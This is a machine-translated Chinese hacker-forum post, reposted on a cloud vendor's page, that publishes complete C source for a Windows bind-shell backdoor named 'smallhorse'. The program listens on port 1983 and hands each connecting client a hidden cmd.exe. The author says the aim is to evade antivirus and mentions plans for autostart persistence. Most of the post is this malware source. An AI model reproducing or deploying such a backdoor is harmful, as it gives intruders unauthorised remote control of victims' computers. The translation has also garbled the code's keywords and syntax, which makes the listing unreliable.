A simple shell Backdoor

Source: Internet
Author: User

A simple shell Backdoor

Author: Pony/smallhorse [e.s. t VIP] (it doesn't matter if you do not write this e.s. t VIP)
Source: evil baboons China

Recently, I was bored and thought about writing a simple shell backdoor. At the same time, anti-virus software K can avoid intrusion. Refer to the T-CMD source code and the previous article related to anti-black. I learned a lot.
The program is very simple. After running the program, port 1983 is opened by default. You can also set the port and wait for the client to connect. You can use NC for the connection. I also wanted to design a service to enable it to run automatically after it is turned on. Due to time issues, it will be improved later.
Usage: The smallhorse [-P port]-p parameter is used to set your own port

The following is the source program, which is posted here to help you learn and make progress together. I hope that you will not give me any advice. Here, I would like to thank you.
QQ: 11189658 E-MAIL: horse_man@163.com

Compiled in VC ++ 6.0 win2003

# Include <winsock2.h>
# Include <stdio. h>
# Pragma comment (Lib, "ws2_32.lib ")
Int Port = 1983;
DWORD winapi clientthread (lpvoid lpparam );
Void help ()
{Printf ("/*********************************** * *** // n ");
Printf ("| this smallhorse's first choice shell v0.1 |/N ");
Printf ("| thanks for using it! |/N ");
Printf ("| smallhorse [e.s. T] VIP 2005.03 |/N ");
Printf ("| ************************************ * ** |/N ");
Printf ("| usage: smallhorse [-P port] |/N ");
Printf ("| Port: port number to listen on |/N ");
Printf ("| default port is 1983 |/N ");
Printf ("//*********************************** * *** // n ");
Return;
}

Void opendoor ()
{
// Initialize Winsock.
Wsadata;
Socket m_socket, acceptclient;
Sockaddr_in service, client;
Int clientsize, I = 0;
Int iresult = wsastartup (makeword (2, 2), & wsadata );
If (iresult! = No_error)
Return;

// Create a socket.

M_socket = socket (af_inet, sock_stream, ipproto_tcp );
If (m_socket = socket_error)
Return;
Service. sin_family = af_inet;
Service. sin_addr.s_addr = htonl (inaddr_any );
Service. sin_port = htons (port );

If (BIND (m_socket, (sockaddr *) & service, sizeof (Service) = socket_error)
Return; // specify

If (Listen (m_socket, 5) = socket_error)
Return; // a maximum of five listeners can be queued.
Printf ("/nsmallhorse listen on port: % d... ^ * ^/N", Port );
Clientsize = sizeof (client );
While (1)
{
Acceptclient = accept (m_socket, (sockaddr *) & client, & clientsize );
If (acceptclient = socket_error)
Return; // accept the connection
Printf ("Client Connected./N ");
Char * sendbuf = "/********************************** * *** // n/tthanks for using... /n/tsmallhorse's writable shell! /N/tgood luck! /N //************************************ * ** // n/n ";
Send (acceptclient, sendbuf, strlen (sendbuf), 0 );

If (createthread (null, 0, clientthread, (lpvoid) & acceptclient, 0, null) = NULL)
Printf ("create thread error! /N ");
Sleep (1000 );
}
Wsacleanup ();
Return;
}
DWORD winapi clientthread (lpvoid lpparam)
{Int ret;
Char Buf [1024];
Handle rpipe, wpipe, wfile, rfile;
Socket acceptclient = (socket) * (socket *) lpparam;

Security_attributes SA;
SA. nlength = sizeof (SA );
SA. binherithandle = true;
SA. lpsecuritydescriptor = NULL;

Ret = createpipe (& rpipe, & rfile, & SA, 0 );
Ret = createpipe (& wfile, & wpipe, & SA, 0); // create two pipelines for receiving commands and Displaying results respectively.

Startupinfo startinfo;
Getstartupinfo (& startinfo );
Startinfo. dwflags = startf_useshowwindow | startf_usestdhandles;
Startinfo. hstdinput = wfile;
Startinfo. hstderror = startinfo. hstdoutput = rfile;
Startinfo. wshowwindow = sw_hide;

Char character line [max_path];
Getsystemdirectory (cmdline, max_path );
Strcat (cmdline, ("// cmd.exe "));

Process_information proinfo;
Ret = CreateProcess (using line, null, & startinfo, & proinfo );
Unsigned long byterec;
While (1)
{
Sleep (100 );
Peeknamedpipe (rpipe, Buf, 1024, & byterec, 0, 0 );
If (byterec ){
Ret = readfile (rpipe, Buf, byterec, & byterec, 0 );
If (! RET)
Break;
Ret = Send (acceptclient, Buf, byterec, 0 );
If (Ret <= 0)
Break;
}
Else {
Byterec = Recv (acceptclient, Buf, 1024,0 );
If (byterec <= 0)
Break;
Ret = writefile (wpipe, Buf, byterec, & byterec, 0 );
If (! RET)
Break;
}
}
Return 0;
}
Int main (INT argc, char * argv [])
{
Help ();
If (argc = 3)
If (! Strcmp (argv [1], "-P "))
Port = atoi (argv [2]);
Opendoor ();
Return 0;
}

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.